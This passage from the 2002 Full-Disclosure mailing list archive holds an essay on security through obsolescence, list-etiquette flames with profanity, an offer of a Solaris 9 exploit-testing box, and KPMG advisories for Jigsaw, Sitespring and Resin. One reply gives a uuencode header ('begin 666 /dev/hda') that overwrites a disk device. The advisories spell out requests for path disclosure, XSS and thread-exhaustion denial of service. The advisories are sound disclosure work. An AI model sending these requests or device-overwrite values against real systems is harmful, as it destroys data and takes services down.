of the script kiddies can figure it out," >> Brian says. "They tend to focus on the latest and greatest, and don't >> have the slightest idea how to handle my old Sun box." >> Brian points out that some of the most secure Department of Defense >> Web sites -- ones that don't make headlines by getting cracked all the >> time -- run old versions of Mac OS and the venerable WebSTAR server >> suite. "[Mac is] a great operating system for that application," he >> says. "No scripting or remote capability at all, so there's no way for >> them to get in." >> Not only that, the hacker/cracker crowd is fixating, as usual, on the >> latest versions of everything, like Windows 2K/XP, Mac OS X, the most >> recent Linux kernels and BSDs, the newest Solaris, and so on. What fun >> is there in breaking into a system running something so ancient only a >> dad would even consider using it? There's also an obscurity factor to >> consider here, and not the one proprietary software advocates usually >> trot out when discussing security issues. >> True "security through obscurity" >> Most Web site takedowns and system intrusions make use of known >> vulnerabilities in a particular operating system or server software >> package. These vulnerabilities are typically discovered, a little at a >> time, by thousands of bad hackers who poke and prod at systems, >> port-scanning and probing them, sharing the information they gain from >> their (mostly failed) attempts with each other. A million monkeys with >> Internet connections may not reproduce any Shakespeare plays -- they >> need to use old-fashioned typewriters to do that -- but they sure as >> bleep are going to find vulnerabilities in any host they contact >> sooner or later simply by sheer weight of numbers, especially if the >> operating system or software they attack is popular enough that they >> have many instances of it out there to look and poke at. It doesn't >> matter whether the operating system and server software under attack >> is proprietary or Open Source. Sooner or later, with enough monkeys >> scratching at it, every single chink or opening can be discovered and >> exploited. >> Imagine a custom operating system used by only a few servers, running >> server software so oddball that cracking lessons learned on mainstream >> servers don't apply to it at all. Or imagine running a DOS variant or >> an OS like AIX that has never been widely used for Net-attached >> servers but is adequate for handing out simple Web pages and receiving >> responses through online forms and handling email, which are the >> primary tasks performed on most publicly-accessible servers. >> Now imagine your local script kiddie trying to crack a box running an >> operating system and server software he's never seen before, about >> which no information is available in the usual online hacker hangouts. >> Chances are, he's going to move on to an easier target. >> This is security through obscurity at its finest. Even if the custom >> operating system and server software are Open Source, low-level >> attackers aren't going to bother poring over the code thoroughly >> enough to find its vulnerabilities, and those few who have the skill >> level needed almost certainly have better things to do with their time >> -- like work -- and won't bother. >> Really dumb stuff >> Never forget, most intrusions and defacements exploit really stupid >> administrator or user mistakes, like using "password" as the password >> for remote access or running all kinds of unnecessary services that >> create security holes so big a whale could dive through them. These >> lapses have nothing to do with the operating system or software being >> used. No operating system or application ever written is immune to >> user stupidity. Some just take more stupidity to botch than others, >> you might say. But that's enough about that. Let's go back to talking >> about old operating systems. >> Age before beauty >> One advantage of mature software is that lots of people have already >> tried to crack it and lots of patches have been written. A smart >> sysadmin like Brian, running an ancient version of Solaris, has kept >> up with security updates over the years and has installed all of them >> he has found. What some people might sneer at as "obsolete" software, >> others might call "carefully tested" or "proven." Indeed, Debian Linux >> users often point to the fact that Debian's stable branch does not >> include the latest kernel or software as one of its great strengths; >> Debian lets others explore the latest and greatest -- and fall victim >> to the latest and greatest exploits -- before all the kinks are worked >> out to the Debian maintainers' satisfaction. >> Note that an awful lot of servers out there are still running on Red >> Hat 6.1 or 6.2, not Red Hat 7.x, and that it takes a long time for the >> latest version of Apache to trickle out into the world full-strength. >> Because these programs have zero licensing cost attached to updates, >> why would so many sysadmins keep using old versions when new ones no >> doubt offer more and slicker features? Obviously, those sysadmins have >> the same outlook as delivery truck fleet managers who refuse to buy a >> new model during its first year or two in production. They prefer to >> wait until all the kinks are worked out and all the defects and >> maintenance tricks have been discovered and applied by early adopters >> before jumping from the tried and true into something new. >> This is sane behavior for a conservative business manager whether she >> is running a fleet of Web servers or a fleet of trucks -- or even a >> fleet of Web servers for a trucking company. But it may be even more >> sane to hold on to the same servers and trucks even when others sneer >> at them as being old, even if new versions are smoother and easier to >> administer or drive. Quite simply, once you have worked with a piece >> of software or a truck for a number of years, you know its quirks >> inside and out. When it acts up in a subtle way someone not used to it >> might not even notice, long experience with it can point an observant >> sysadmin or mechanic straight to a problem, thereby saving downtime >> and repair costs. >> Because "Total Cost of Ownership" is the big management buzz phrase >> that cuts across all business areas, and anything new requires a >> learning curve, sometimes it is best to just keep on using the old >> whatever as long as it does its job reasonably well. >> At some point -- hopefully before Microsoft stops supporting it -- >> Windows NT may be reasonably secure against most common exploits. If >> nothing else, by that time there will be hundreds of thousands of >> sysadmins who have learned how to secure it as hard as possible, even >> if they had to learn some lessons the hard way -- by getting cracked. >> At the same time, the script kiddies and malicious hackers who ran >> roughshod over NT servers when they first appeared have aged. Most of >> them probably have jobs and responsibilities by now, and aren't >> getting their kicks playing in other people's systems but are busily >> securing ones they run themselves. >> The next generation of bad-kid hackers probably won't mess much with >> NT -- or pre-X Mac OS or Linux pre-2.5 kernels or Apache pre-2.x or >> any of the other operating systems and server applications their >> fathers or older siblings ran "back in the day," while those same >> fathers and older siblings will have piled up endless experience >> securing those old, now-obscure programs, making them harder targets >> than the latest stuff. >> You never read about this kind of "security through obscurity," which >> can just as correctly be called "security through obsolescence." >> Despite this lack of publicity, it may be as effective a tactic as any >> other, and it can be implemented without spending a dime. >> ? Newsforge. All rights reserved > > > _______________________________________________ > Full-Disclosure - We believe in it. > Full-Disclosure at lists.netsys.com > http://lists.netsys.com/mailman/listinfo/full-disclosure > From core at bokeoa.com Tue Jul 16 12:00:56 2002 From: core at bokeoa.com (Charles 'core' Stevenson) Date: Tue, 16 Jul 2002 05:00:56 -0600 Subject: [Full-Disclosure] Sharutils buggy? References: <20020715232430.GA14187@fishbowl.madduck.net> <16180000.1026803573@localhost> Message-ID: <3D33FCE8.40605@bokeoa.com> That's just plan evil Peter! ;) peace, core Peter Bieringer wrote: > > --On Tuesday, July 16, 2002 01:24:30 AM +0200 martin f krafft > wrote: > > >>I'd like to get some educated thoughts and opinions on a recently >>found potential bug: >> >> http://www.aerasec.de/security/index.html?lang=en&id=ae-200205-037 >> http://online.securityfocus.com/bid/4742 >> http://www.aerasec.de/security/index.html?lang=en&id=ae-200205-049 >> http://www.aerasec.de/security/index.html?lang=en&id=ae-200204-033 >> http://bugs.debian.org/149454 >> http://www.kb.cert.org/vuls/id/336083 > > > One additial memo: > > The original advisory and afaik the fixed version from RHL still not > metioned that devices also are candidates for overwriting. > > Think about > > begin 666 /dev/hda > ... > > > Peter > > _______________________________________________ > Full-Disclosure - We believe in it. > Full-Disclosure at lists.netsys.com > http://lists.netsys.com/mailman/listinfo/full-disclosure > > From csnow at deltadentalwa.com Tue Jul 16 18:15:03 2002 From: csnow at deltadentalwa.com (Snow, Corey) Date: Tue, 16 Jul 2002 10:15:03 -0700 Subject: [Full-Disclosure] List Charter Message-ID: There are many people who use mailing lists from a facility or system where they have no control over what the mail system appends to outgoing email, regardless of the address. I'm not the only one on this list whose email has such disclaimers attached to it. I could also suggest that asinine, puerile flame-bait that doesn't contribute to the positive side of the signal to noise ratio on the list should be forbidden, but really- that's just common sense. Corey M. Snow- csnow at deltadentalwa.com I don't speak for my employer. > -----Original Message----- > From: Raju Mathur [mailto:raju at linux-delhi.org] > Sent: Monday, July 15, 2002 6:16 PM > To: full-disclosure at lists.netsys.com > Subject: RE: [Full-Disclosure] List Charter > > > >>>>> "Corey" == Corey Snow writes: > > Corey> [snip] > > Corey> ######################################################### > Corey> The information contained in this e-mail and subsequent > Corey> attachments may be privileged, confidential and protected > Corey> from disclosure. This transmission is intended for the > Corey> sole use of the individual and entity to whom it is > Corey> addressed. If you are not the intended recipient, any > Corey> dissemination, distribution or copying is strictly > Corey> prohibited. If you think that you have received this > Corey> message in error, please e-mail the sender at the above > Corey> e-mail address. > Corey> ######################################################### > > You could also add that quasi-legal messages like the one above are > not permitted on the list. Unless, of course, the list maintainers > have enough of a legal defense fund to bear the costs of being sued > for disseminating a `privileged, confidential and protected from > disclosure' message despite being warned. > > Oooh, you put it on Google too, you naughty boy you! > > By reading this message you agree to pay me $1000 on the 3rd of each > month whose name contains a vowel. > > -- Raju > -- > Raju Mathur raju at kandalaya.org http://kandalaya.org/ It is the mind that moves _______________________________________________ Full-Disclosure - We believe in it. Full-Disclosure at lists.netsys.com http://lists.netsys.com/mailman/listinfo/full-disclosure ######################################################### The information contained in this e-mail and subsequent attachments may be privileged, confidential and protected from disclosure. This transmission is intended for the sole use of the individual and entity to whom it is addressed. If you are not the intended recipient, any dissemination, distribution or copying is strictly prohibited. If you think that you have received this message in error, please e-mail the sender at the above e-mail address. ######################################################### From steve at entrenchtech.com Tue Jul 16 18:54:40 2002 From: steve at entrenchtech.com (Steve) Date: Tue, 16 Jul 2002 11:54:40 -0600 Subject: [Full-Disclosure] List Charter References: Message-ID: <005d01c22cf1$db917a40$f954b8a1@entrenchtech.com> All flames aside, what I find amusing about these email disclaimers is that they don't have a legal leg to stand on in North America (USA and Canada). They are nothing but a waste of email space. ----- Original Message ----- From: "Snow, Corey" To: Sent: Tuesday, July 16, 2002 11:15 AM Subject: RE: [Full-Disclosure] List Charter > There are many people who use mailing lists from a facility or system where > they have no control over what the mail system appends to outgoing email, > regardless of the address. I'm not the only one on this list whose email has > such disclaimers attached to it. > > I could also suggest that asinine, puerile flame-bait that doesn't > contribute to the positive side of the signal to noise ratio on the list > should be forbidden, but really- that's just common sense. > > Corey M. Snow- csnow at deltadentalwa.com > I don't speak for my employer. > > > > -----Original Message----- > > From: Raju Mathur [mailto:raju at linux-delhi.org] > > Sent: Monday, July 15, 2002 6:16 PM > > To: full-disclosure at lists.netsys.com > > Subject: RE: [Full-Disclosure] List Charter > > > > > > >>>>> "Corey" == Corey Snow writes: > > > > Corey> [snip] > > > > Corey> ######################################################### > > Corey> The information contained in this e-mail and subsequent > > Corey> attachments may be privileged, confidential and protected > > Corey> from disclosure. This transmission is intended for the > > Corey> sole use of the individual and entity to whom it is > > Corey> addressed. If you are not the intended recipient, any > > Corey> dissemination, distribution or copying is strictly > > Corey> prohibited. If you think that you have received this > > Corey> message in error, please e-mail the sender at the above > > Corey> e-mail address. > > Corey> ######################################################### > > > > You could also add that quasi-legal messages like the one above are > > not permitted on the list. Unless, of course, the list maintainers > > have enough of a legal defense fund to bear the costs of being sued > > for disseminating a `privileged, confidential and protected from > > disclosure' message despite being warned. > > > > Oooh, you put it on Google too, you naughty boy you! > > > > By reading this message you agree to pay me $1000 on the 3rd of each > > month whose name contains a vowel. > > > > -- Raju > > -- > > Raju Mathur raju at kandalaya.org > http://kandalaya.org/ > It is the mind that moves > _______________________________________________ > Full-Disclosure - We believe in it. > Full-Disclosure at lists.netsys.com > http://lists.netsys.com/mailman/listinfo/full-disclosure > > ######################################################### > The information contained in this e-mail and subsequent attachments may be privileged, > confidential and protected from disclosure. This transmission is intended for the sole > use of the individual and entity to whom it is addressed. If you are not the intended > recipient, any dissemination, distribution or copying is strictly prohibited. If you > think that you have received this message in error, please e-mail the sender at the above > e-mail address. > ######################################################### > _______________________________________________ > Full-Disclosure - We believe in it. > Full-Disclosure at lists.netsys.com > http://lists.netsys.com/mailman/listinfo/full-disclosure From pauls at utdallas.edu Tue Jul 16 19:24:03 2002 From: pauls at utdallas.edu (Schmehl, Paul L) Date: Tue, 16 Jul 2002 13:24:03 -0500 Subject: [Full-Disclosure] List Charter Message-ID: <871080DEC5874D41B4E3AFC5C400611E026EE799@UTDEVS02.campus.ad.utdallas.edu> Yet every law firm has one....... Paul Schmehl (pauls at utdallas.edu) Supervisor of Support Services The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu/~pauls/ > -----Original Message----- > From: Steve [mailto:steve at entrenchtech.com] > Sent: Tuesday, July 16, 2002 12:55 PM > To: full-disclosure at lists.netsys.com > Subject: Re: [Full-Disclosure] List Charter > > > All flames aside, what I find amusing about these email > disclaimers is that they don't have a legal leg to stand on > in North America (USA and Canada). They are nothing but a > waste of email space. From core at bokeoa.com Tue Jul 16 19:36:24 2002 From: core at bokeoa.com (Charles 'core' Stevenson) Date: Tue, 16 Jul 2002 12:36:24 -0600 Subject: [Full-Disclosure] List Charter References: <871080DEC5874D41B4E3AFC5C400611E026EE799@UTDEVS02.campus.ad.utdallas.edu> Message-ID: <3D3467A8.8000206@bokeoa.com> I have to give you people credit you've managed to talk about lots of bullshit. Post some exploits or shut the fuck up! peace, core Schmehl, Paul L wrote: > Yet every law firm has one....... > > Paul Schmehl (pauls at utdallas.edu) > Supervisor of Support Services > The University of Texas at Dallas > AVIEN Founding Member > http://www.utdallas.edu/~pauls/ > > > >>-----Original Message----- >>From: Steve [mailto:steve at entrenchtech.com] >>Sent: Tuesday, July 16, 2002 12:55 PM >>To: full-disclosure at lists.netsys.com >>Subject: Re: [Full-Disclosure] List Charter >> >> >>All flames aside, what I find amusing about these email >>disclaimers is that they don't have a legal leg to stand on >>in North America (USA and Canada). They are nothing but a >>waste of email space. > > _______________________________________________ > Full-Disclosure - We believe in it. > Full-Disclosure at lists.netsys.com > http://lists.netsys.com/mailman/listinfo/full-disclosure > > From steve at entrenchtech.com Tue Jul 16 19:40:02 2002 From: steve at entrenchtech.com (Steve) Date: Tue, 16 Jul 2002 12:40:02 -0600 Subject: [Full-Disclosure] List Charter References: <871080DEC5874D41B4E3AFC5C400611E026EE799@UTDEVS02.campus.ad.utdallas.edu> <3D3467A8.8000206@bokeoa.com> Message-ID: <007701c22cf8$31f497e0$f954b8a1@entrenchtech.com> Sorry to bother you o l33t h4x04 one. not! assclown ----- Original Message ----- From: "Charles 'core' Stevenson" To: Sent: Tuesday, July 16, 2002 12:36 PM Subject: Re: [Full-Disclosure] List Charter > I have to give you people credit you've managed to talk about lots of > bullshit. Post some exploits or shut the fuck up! > > peace, > core > > Schmehl, Paul L wrote: > > Yet every law firm has one....... > > > > Paul Schmehl (pauls at utdallas.edu) > > Supervisor of Support Services > > The University of Texas at Dallas > > AVIEN Founding Member > > http://www.utdallas.edu/~pauls/ > > > > > > > >>-----Original Message----- > >>From: Steve [mailto:steve at entrenchtech.com] > >>Sent: Tuesday, July 16, 2002 12:55 PM > >>To: full-disclosure at lists.netsys.com > >>Subject: Re: [Full-Disclosure] List Charter > >> > >> > >>All flames aside, what I find amusing about these email > >>disclaimers is that they don't have a legal leg to stand on > >>in North America (USA and Canada). They are nothing but a > >>waste of email space. > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Full-Disclosure at lists.netsys.com > > http://lists.netsys.com/mailman/listinfo/full-disclosure > > > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Full-Disclosure at lists.netsys.com > http://lists.netsys.com/mailman/listinfo/full-disclosure From arawak at blueyonder.co.uk Tue Jul 16 20:52:14 2002 From: arawak at blueyonder.co.uk (arawak) Date: Tue, 16 Jul 2002 20:52:14 +0100 Subject: [Full-Disclosure] List Charter In-Reply-To: <007701c22cf8$31f497e0$f954b8a1@entrenchtech.com> Message-ID: What is happening with this list ? Somehow it is loosing the battle with people trying to undermine what could be really informative list. Is moderation the answer? Profanity & useless tittle tattle does nothing but make the list close down. Is there some underhand subversiveness pushing the list off the net? Luck is my game ;-) Openess is my aim :) A :-) -----Original Message----- From: full-disclosure-admin at lists.netsys.com [mailto:full-disclosure-admin at lists.netsys.com] On Behalf Of Steve Sent: Tuesday, July 16, 2002 7:40 PM To: full-disclosure at lists.netsys.com Subject: Re: [Full-Disclosure] List Charter Sorry to bother you o l33t h4x04 one. not! assclown ----- Original Message ----- From: "Charles 'core' Stevenson" To: Sent: Tuesday, July 16, 2002 12:36 PM Subject: Re: [Full-Disclosure] List Charter > I have to give you people credit you've managed to talk about lots of > bullshit. Post some exploits or shut the fuck up! > > peace, > core > > Schmehl, Paul L wrote: > > Yet every law firm has one....... > > > > Paul Schmehl (pauls at utdallas.edu) > > Supervisor of Support Services > > The University of Texas at Dallas > > AVIEN Founding Member > > http://www.utdallas.edu/~pauls/ > > > > > > > >>-----Original Message----- > >>From: Steve [mailto:steve at entrenchtech.com] > >>Sent: Tuesday, July 16, 2002 12:55 PM > >>To: full-disclosure at lists.netsys.com > >>Subject: Re: [Full-Disclosure] List Charter > >> > >> > >>All flames aside, what I find amusing about these email > >>disclaimers is that they don't have a legal leg to stand on > >>in North America (USA and Canada). They are nothing but a > >>waste of email space. > > > > _______________________________________________ > > Full-Disclosure - We believe in it. Full-Disclosure at lists.netsys.com > > http://lists.netsys.com/mailman/listinfo/full-disclosure > > > > > > > _______________________________________________ > Full-Disclosure - We believe in it. Full-Disclosure at lists.netsys.com > http://lists.netsys.com/mailman/listinfo/full-disclosure _______________________________________________ Full-Disclosure - We believe in it. Full-Disclosure at lists.netsys.com http://lists.netsys.com/mailman/listinfo/full-disclosure From len at netsys.com Tue Jul 16 22:51:41 2002 From: len at netsys.com (Len Rose) Date: Tue, 16 Jul 2002 17:51:41 -0400 Subject: [Full-Disclosure] List Charter In-Reply-To: ; from arawak@blueyonder.co.uk on Tue, Jul 16, 2002 at 08:52:14PM +0100 References: <007701c22cf8$31f497e0$f954b8a1@entrenchtech.com> Message-ID: <20020716175141.E558@netsys.com> I'd say give it some time.. it's only been alive a short time. The more technical and less conversational the better. Those are just my opinions, though.. ultimately the readers will decide whether it's useful or not. Len On Tue, Jul 16, 2002 at 08:52:14PM +0100, arawak wrote: > What is happening with this list ? > > Somehow it is loosing the battle with people trying > to undermine what could be really informative list. > > Is moderation the answer? > > Profanity & useless tittle tattle does nothing but > make the list close down. > > Is there some underhand subversiveness pushing the > list off the net? > > Luck is my game ;-) > Openess is my aim :) > > A :-) > From len at netsys.com Tue Jul 16 23:04:33 2002 From: len at netsys.com (Len Rose) Date: Tue, 16 Jul 2002 18:04:33 -0400 Subject: [Full-Disclosure] solaris 9 playpen Message-ID: <20020716180433.G558@netsys.com> Who would be interested in access to a sparc machine running solaris 9 for exploit testing? I'm thinking about allowing access to a few people who would like to work on things like examining the buffer overflow in solaris 9 rcp :) Access would be granted on the basis of obtaining full and legitimate contact information, phone numbers, etc. We'd also need IP addresses for firewall filters, etc. Just thought I'd throw the idea out there. Contact me off list and I'll collect information.. Len From sert at snosoft.com Tue Jul 16 19:11:51 2002 From: sert at snosoft.com (John Scimone) Date: Tue, 16 Jul 2002 18:11:51 +0000 Subject: [Full-Disclosure] solaris 9 playpen In-Reply-To: <20020716180433.G558@netsys.com> References: <20020716180433.G558@netsys.com> Message-ID: <200207161811.51984.sert@snosoft.com> I like this idea, if I had more time this week I would volunteer, however, when the research goes underway on that overflow please keep the list updated, it will be nice to read some useful information on the list for once. G'day. -sert Secure Network Operations www.snosoft.com On Tuesday 16 July 2002 10:04 pm, Len Rose wrote: > Who would be interested in access to a sparc machine > running solaris 9 for exploit testing? I'm thinking > about allowing access to a few people who would like > to work on things like examining the buffer overflow in > solaris 9 rcp :) > > Access would be granted on the basis of obtaining full > and legitimate contact information, phone numbers, etc. > > We'd also need IP addresses for firewall filters, etc. > > Just thought I'd throw the idea out there. > > Contact me off list and I'll collect information.. > > Len > > _______________________________________________ > Full-Disclosure - We believe in it. > Full-Disclosure at lists.netsys.com > http://lists.netsys.com/mailman/listinfo/full-disclosure From dotslash at snosoft.com Wed Jul 17 05:14:36 2002 From: dotslash at snosoft.com (KF) Date: Tue, 16 Jul 2002 21:14:36 -0700 Subject: [Full-Disclosure] default list reply-to: address References: <20020716180433.G558@netsys.com> Message-ID: <3D34EF2C.50901@snosoft.com> does the default reply to: HAVE to be the list address instead of the individual that sent it? I assume this was a choice config option during the list setup? I find my self wanting to reply only to the individual the wrote the email however when reply or reply to all is clicked the only address is full-disclosure at lists.netsys.com... can be a pain in the arse if in a hurry ... I think I have sent some cute comments out at least twice during a hasty reply. -KF From dufresne at winternet.com Wed Jul 17 02:34:33 2002 From: dufresne at winternet.com (Ron DuFresne) Date: Tue, 16 Jul 2002 20:34:33 -0500 (CDT) Subject: [Full-Disclosure] List Charter In-Reply-To: <20020716175141.E558@netsys.com> Message-ID: I can't help but get the impression from some of the comments that certain folks expect nothing more then a technical advisories list and seeing the array of other threads, that some are really looking for a list in which to dicuss various aspects of security. some are seeking another bugtraq type list, unmoderated, while others seem to be seeking something on the order of the firewalls and firewalls wizards lists. The evolution of the list will be interesting, as new lists tend to be . Thanks, Ron DuFresne On Tue, 16 Jul 2002, Len Rose wrote: > I'd say give it some time.. it's only been alive a short > time. The more technical and less conversational the better. > > Those are just my opinions, though.. ultimately the readers > will decide whether it's useful or not. > > Len > > On Tue, Jul 16, 2002 at 08:52:14PM +0100, arawak wrote: > > What is happening with this list ? > > > > Somehow it is loosing the battle with people trying > > to undermine what could be really informative list. > > > > Is moderation the answer? > > > > Profanity & useless tittle tattle does nothing but > > make the list close down. > > > > Is there some underhand subversiveness pushing the > > list off the net? > > > > Luck is my game ;-) > > Openess is my aim :) > > > > A :-) > > > _______________________________________________ > Full-Disclosure - We believe in it. > Full-Disclosure at lists.netsys.com > http://lists.netsys.com/mailman/listinfo/full-disclosure > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. From mail at blazde.co.uk Wed Jul 17 02:44:24 2002 From: mail at blazde.co.uk (Roland Postle) Date: Wed, 17 Jul 2002 02:44:24 +0100 Subject: [Full-Disclosure] default list reply-to: address References: <20020716180433.G558@netsys.com> <3D34EF2C.50901@snosoft.com> Message-ID: <001501c22d33$7d2628b0$0a00a8c0@violetclub> > does the default reply to: HAVE to be the list address instead of the > individual that sent it? I assume this was a choice config option during > the list setup? I find my self wanting to reply only to the individual > the wrote the email however when reply or reply to all is clicked the > only address is full-disclosure at lists.netsys.com... can be a pain in the > arse if in a hurry ... I think I have sent some cute comments out at > least twice during a hasty reply. For what it's worth, I prefer it that way. With the exception of securityfocus' lists, all the mailing lists I'm on do it that way. It's what I'm used to, and, since the majority of replies go to the list not the individual who wrote the original post, it makes sense. 'Course, if you're the type that likes to flame everyone off-list without stopping to consider who you're writing to it might not be so convenient..... :p The [Full-Disclosure] in the subject (that someone else objected to) I like as well, but I don't have such good reasons. I just like it. - Blazde From madduck at madduck.net Wed Jul 17 09:56:41 2002 From: madduck at madduck.net (martin f krafft) Date: Wed, 17 Jul 2002 10:56:41 +0200 Subject: [Full-Disclosure] default list reply-to: address In-Reply-To: <001501c22d33$7d2628b0$0a00a8c0@violetclub> References: <20020716180433.G558@netsys.com> <3D34EF2C.50901@snosoft.com> <001501c22d33$7d2628b0$0a00a8c0@violetclub> Message-ID: <20020717085641.GA18830@fishbowl.madduck.net> also sprach Roland Postle [2002.07.17.0344 +0200]: > For what it's worth, I prefer it that way. With the exception of > securityfocus' lists, all the mailing lists I'm on do it that way. It's what > I'm used to, and, since the majority of replies go to the list not the > individual who wrote the original post, it makes sense. Which is why proper mail clients handle this appropriately. In Mutt, I press 'r' to reply to the author, 'l' to reply to the list, and 'g' to reply to both. Obviously this breaks when Reply-To is set... Anyway, I give you this to read: http://www.unicom.com/pw/reply-to-harmful.html > The [Full-Disclosure] in the subject (that someone else objected to) I like > as well, but I don't have such good reasons. I just like it. It wastes bandwidth and doesn't add information that you couldn't add on the client-side. I am opposed. -- martin; (greetings from the heart of the sun.) \____ echo mailto: !#^."<*>"|tr "<*> mailto:" net at madduck quantum mechanics: the dreams stuff is made of. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 240 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020717/d74126da/attachment.bin From pgrundl at kpmg.dk Wed Jul 17 10:27:32 2002 From: pgrundl at kpmg.dk (=?iso-8859-1?Q?Peter_Gr=FCndl?=) Date: Wed, 17 Jul 2002 11:27:32 +0200 Subject: [Full-Disclosure] KPMG-2002031: Jigsaw Webserver Path Disclosure Message-ID: <005401c22d74$2d736a30$2500a8c0@kpmguek0e8d7an> -------------------------------------------------------------------- Title: Jigsaw Webserver Path Disclosure BUG-ID: 2002031 Released: 17th Jul 2002 -------------------------------------------------------------------- Problem: ======== It is possible to disclose the physical path to the webroot. This information could be useful to a malicious user wishing to gain illegal access to resources on the server. Vulnerable: =========== - Jigsaw V2.2.1 Distribution on Windows 2000 Server Not Vulnerable: =============== - Jigsaw V2.2.1 Dev/2.2/20020711 on Windows 2000 Server Product Description: ==================== Quoted from the vendor webpage: "Jigsaw is W3C's leading-edge Web server platform, providing a sample HTTP 1.1 implementation and a variety of other features on top of an advanced architecture implemented in Java. The W3C Jigsaw Activity statement explains the motivation and future plans in more detail. Jigsaw is an W3C Open Source Project, started May 1996." Details: ======== Requesting /aux two times, results in an error message, after second request, containing the physical path to the web root. Vendor URL: =========== You can visit the vendor webpage here: http://www.w3.org Vendor response: ================ The vendor was notified on the 27th of May, 2002. On the 11th of July, 2002 we verified that the issue was corrected in the latest build (20020708). Corrective action: ================== Upgrade your Jigsaw.jar to the latest build, available from: http://jigsaw.w3.org/Devel/classes-2.2/20020711/ Author: Peter Gr?ndl (pgrundl at kpmg.dk) -------------------------------------------------------------------- KPMG is not responsible for the misuse of the information we provide through our security advisories. These advisories are a service to the professional security community. In no event shall KPMG be lia- ble for any consequences whatsoever arising out of or in connection with the use or spread of this information. -------------------------------------------------------------------- From pgrundl at kpmg.dk Wed Jul 17 10:31:43 2002 From: pgrundl at kpmg.dk (=?iso-8859-1?Q?Peter_Gr=FCndl?=) Date: Wed, 17 Jul 2002 11:31:43 +0200 Subject: [Full-Disclosure] KPMG-2002032: Macromedia Sitespring Cross Site Scripting Message-ID: <00ab01c22d74$c32a9800$2500a8c0@kpmguek0e8d7an> -------------------------------------------------------------------- Title: Macromedia Sitespring Cross Site Scripting BUG-ID: 2002032 Released: 17th Jul 2002 -------------------------------------------------------------------- Problem: ======== A malicious user could use a default error page as the basis for a cross site scripting attack. Vulnerable: =========== - Macromedia Sitespring V1.2.0(277.1) on Windows 2000 Server Details: ======== The default HTTP 500 error script does not check the contents of the error ticket (et) parameter before outputting it. That makes it possible to inject eg. javascript in the URL. http://server/error/500error.jsp?et=1 Vendor URL: =========== You can visit the vendor webpage here: http://www.macromedia.com Vendor response: ================ The vendor was notified on the 16th of April, 2002. The vendor has since removed the trial software from the webpage. To our knowledge there is no scheduled release date for a patch. Additional notes: ================= Quoted from the vendors webpage: "We will continue to provide technical support for Sitespring through May 2004. Please continue to visit the Sitespring support center for TechNotes, white papers, and other product information. If you've purchased a technical support plan for Sitespring, we will continue to provide support pursuant to the terms of your support agreement. Even though we will not be selling annual Sitespring support packages, you can purchase incident-based support from a technical support engineer." Corrective action: ================== Replace the error script with a custom error page. If you do not know how to create a .jsp file, simply create a standard 500 error page in html, and rename it to .jsp. Author: Peter Gr?ndl (pgrundl at kpmg.dk) -------------------------------------------------------------------- KPMG is not responsible for the misuse of the information we provide through our security advisories. These advisories are a service to the professional security community. In no event shall KPMG be lia- ble for any consequences whatsoever arising out of or in connection with the use or spread of this information. -------------------------------------------------------------------- From pgrundl at kpmg.dk Wed Jul 17 10:34:02 2002 From: pgrundl at kpmg.dk (=?iso-8859-1?Q?Peter_Gr=FCndl?=) Date: Wed, 17 Jul 2002 11:34:02 +0200 Subject: [Full-Disclosure] KPMG-2002033: Resin DOS device path disclosure Message-ID: <010301c22d75$1653cf10$2500a8c0@kpmguek0e8d7an> -------------------------------------------------------------------- Title: Resin DOS device path disclosure BUG-ID: 2002033 Released: 17th Jul 2002 -------------------------------------------------------------------- Problem: ======== It is possible to disclose the physical path to the webroot. This information could be useful to a malicious user wishing to gain illegal access to resources on the server. Vulnerable: =========== - Resin 2.1.1 on Windows 2000 Server - Resin 2.1.2 on Windows 2000 Server Not Vulnerable: =============== - Resin 2.1.s020711 on Windows 2000 Server Details: ======== Requesting certain DOS devices, such as lpt9.xtp, results in an error message that contains the physical path to the web root. 500 Servlet Exception java.io.FileNotFoundException: C:\Documents and Settings\Administrator \Desktop\resin-2.1.1\resin-2.1.1\doc\aux.xtp (Access is denied) Vendor URL: =========== You can visit the vendor webpage here: http://www.caucho.com Vendor response: ================ The vendor was notified on the 22nd of May, 2002. On the 12th of July we verified that the problem was corrected in the latest build (s020711). Corrective action: ================== Upgrade to a newer version. This issue was first resolved in build s020711, available here: http://www.caucho.com/download/index.xtp Author: Peter Gr?ndl (pgrundl at kpmg.dk) -------------------------------------------------------------------- KPMG is not responsible for the misuse of the information we provide through our security advisories. These advisories are a service to the professional security community. In no event shall KPMG be lia- ble for any consequences whatsoever arising out of or in connection with the use or spread of this information. -------------------------------------------------------------------- From pgrundl at kpmg.dk Wed Jul 17 10:36:45 2002 From: pgrundl at kpmg.dk (=?iso-8859-1?Q?Peter_Gr=FCndl?=) Date: Wed, 17 Jul 2002 11:36:45 +0200 Subject: [Full-Disclosure] KPMG-2002034: Jigsaw Webserver DOS device DoS Message-ID: <015f01c22d75$7729b200$2500a8c0@kpmguek0e8d7an> -------------------------------------------------------------------- Title: Jigsaw Webserver DOS device DoS BUG-ID: 2002034 Released: 17th Jul 2002 -------------------------------------------------------------------- Problem: ======== A malicious user can tie up working threads on the web server. when the web server runs out of working threads, the web server will no longer service web requests. Vulnerable: =========== - Jigsaw V2.2.1 Distribution on Windows 2000 Server Not Vulnerable: =============== - Jigsaw V2.2.1 Dev/2.2/20020711 on Windows 2000 Server Product Description: ==================== Quoted from the vendor webpage: "Jigsaw is W3C's leading-edge Web server platform, providing a sample HTTP 1.1 implementation and a variety of other features on top of an advanced architecture implemented in Java. The W3C Jigsaw Activity statement explains the motivation and future plans in more detail. Jigsaw is an W3C Open Source Project, started May 1996." Details: ======== Requests for /servlet/con never times out, and approximately 30 of these requests is enough to tie up all working threads on the server. The service needs to be restarted to recover. Vendor URL: =========== You can visit the vendor webpage here: http://www.w3.org Vendor response: ================ The vendor was notified on the 27nd of May, 2002. On the 12th of July we verified that the problem was corrected in the latest build (s020711). Corrective action: ================== Upgrade to a newer version. This issue was first resolved in build s020711, available here: 